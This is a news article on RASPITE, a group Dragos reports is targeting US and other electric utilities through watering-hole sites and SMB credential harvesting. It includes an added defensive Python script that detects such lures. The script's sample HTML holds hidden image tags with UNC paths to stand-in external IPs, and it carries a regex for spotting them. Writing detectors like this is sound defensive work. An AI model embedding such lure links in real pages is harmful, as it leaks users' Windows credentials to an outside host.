New ICS Adversary Group Targeting US Utilities


A newly discovered adversarial group has been targeting operations in electrical utilities in the US, according to Dragos. The activity group, dubbed RASPITE, has reportedly been active in some capacity since early to mid-2017.

Dragos reports that RASPITE is now targeting ICS operators, specifically electric utilities, with activity observed in the US, Europe, the Middle East and East Asia. While the group's targeting of electric utilities is confirmed, there is no current indication that it has the capability to carry out a destructive ICS attack such as the widespread blackouts seen in Ukraine.

Detailed in a blog post, Dragos' analysis of the group's activity shows that RASPITE currently focuses on initial access operations within the electric utility sector. It gains access to target networks through strategic website compromise (watering-hole attacks). Dragos also maps RASPITE to LeafMiner, a group operating in the Middle East that Symantec recently reported on.

“RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials,” the blog post stated. Once the group has a foothold, it deploys install scripts that give it remote access to the victim machine through a malicious service that beacons back to RASPITE-controlled infrastructure.
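The technique quoted above works because a Windows client that renders a UNC path (`\\host\share`) or a `file://` link will open an SMB connection to that host and, by default, attempt NTLM authentication, handing the attacker a challenge/response that can be cracked or relayed. The following is an added example written for this article, not code from Dragos or from the report; it shows the two checks a defender can run against this tradecraft: scan page or document content for resource references that would trigger an outbound SMB connection, and scan firewall records for internal hosts reaching external addresses on SMB ports. The internal DNS suffix `.corp.example`, the sample page, and the `key=value` firewall log format are all constructed assumptions.

```python
"""Detect SMB credential-harvesting lures of the kind quoted above.

Two checks:
  1. scan web page / document content for UNC or file:// references that
     would make a Windows client initiate an outbound SMB connection; and
  2. scan firewall log lines for internal hosts connecting to external
     addresses on SMB ports (445/139), which is what such a lure produces.

All sample data below is constructed; INTERNAL_SUFFIX and the log format
are assumptions, not anything taken from the Dragos report.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# Assumption: the organisation's internal DNS suffix. Hostnames under it
# (and single-label NetBIOS-style names) are treated as internal.
INTERNAL_SUFFIX = ".corp.example"

PRIVATE_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]

SMB_PORTS = {"445", "139"}

# Forms of a resource reference that make Windows start an SMB (and thus
# NTLM) exchange:  \\host\share   file://host/share   %5C%5Chost (encoded \\)
UNC_RE = re.compile(r"(?i)(?:\\\\|file:/{2,}|%5c%5c)([a-z0-9.\-]+)")


def is_external(host: str) -> bool:
    """True if host lies outside private address space / the internal DNS."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP: single-label names resolve internally (NetBIOS/WINS);
        # anything else is internal only under the assumed corporate suffix.
        return "." in host and not host.lower().endswith(INTERNAL_SUFFIX)
    return not any(ip in net for net in PRIVATE_NETS)


def find_smb_links(content: str) -> List[Tuple[str, bool]]:
    """Return (host, is_external) for each distinct UNC/file:// reference."""
    seen: Dict[str, bool] = {}
    for match in UNC_RE.finditer(content):
        host = match.group(1).rstrip(".")
        if host not in seen:
            seen[host] = is_external(host)
    return list(seen.items())


def flag_outbound_smb(log_lines: List[str]) -> List[Dict[str, str]]:
    """Return records for TCP flows from internal hosts to external SMB ports.

    A denied flow is still reported: the attempt itself shows a lure fired
    on that host, which is the detection opportunity.
    """
    hits = []
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
        if fields.get("proto") != "tcp" or fields.get("dport") not in SMB_PORTS:
            continue
        if not is_external(fields.get("src", "")) and is_external(fields.get("dst", "")):
            hits.append(fields)
    return hits


# Constructed sample page: two lures point at external hosts, two at internal.
SAMPLE_PAGE = r"""
<html><body>
<img src="\\203.0.113.7\share\logo.png" width="1" height="1">
<a href="file://fileserver.corp.example/docs/readme.docx">Procedures</a>
<img src="%5C%5C198.51.100.23%5Cimages%5Cpixel.png">
<a href="\\10.1.2.3\public\forms.pdf">Forms</a>
</body></html>
"""

# Constructed firewall records (key=value layout is an assumption).
SAMPLE_LOGS = [
    "2018-08-02T10:15:03Z action=allow proto=tcp src=10.20.30.40 sport=51234 dst=203.0.113.7 dport=445",
    "2018-08-02T10:15:04Z action=allow proto=tcp src=10.20.30.40 sport=51235 dst=10.0.0.5 dport=445",
    "2018-08-02T10:15:05Z action=allow proto=tcp src=10.20.30.41 sport=51236 dst=203.0.113.7 dport=443",
    "2018-08-02T10:15:06Z action=deny proto=tcp src=10.20.30.42 sport=51237 dst=198.51.100.23 dport=445",
]

if __name__ == "__main__":
    for host, external in find_smb_links(SAMPLE_PAGE):
        print(f"{'EXTERNAL' if external else 'internal'} SMB reference -> {host}")
    for rec in flag_outbound_smb(SAMPLE_LOGS):
        print(f"outbound SMB: {rec['src']} -> {rec['dst']}:{rec['dport']} ({rec['action']})")
```

The content scan is a triage aid for a suspected watering-hole page or a phishing attachment; the log check is the durable control, since any outbound 445/139 from a workstation to the internet is abnormal and is what the lure actually produces. Blocking those ports at the egress firewall removes the harvesting path outright, and the log check then reports which hosts tried.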

“Dragos caught RASPITE early in its maturity, which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques, which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” said Sergio Caltagirone, director of threat intelligence, Dragos.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups. Although Dragos does not conduct country-specific attribution of industrial control threats, generally threats focused on industrial control are state sponsored due to the inherent risk, limited financial gain and potential blow back from the operations.”
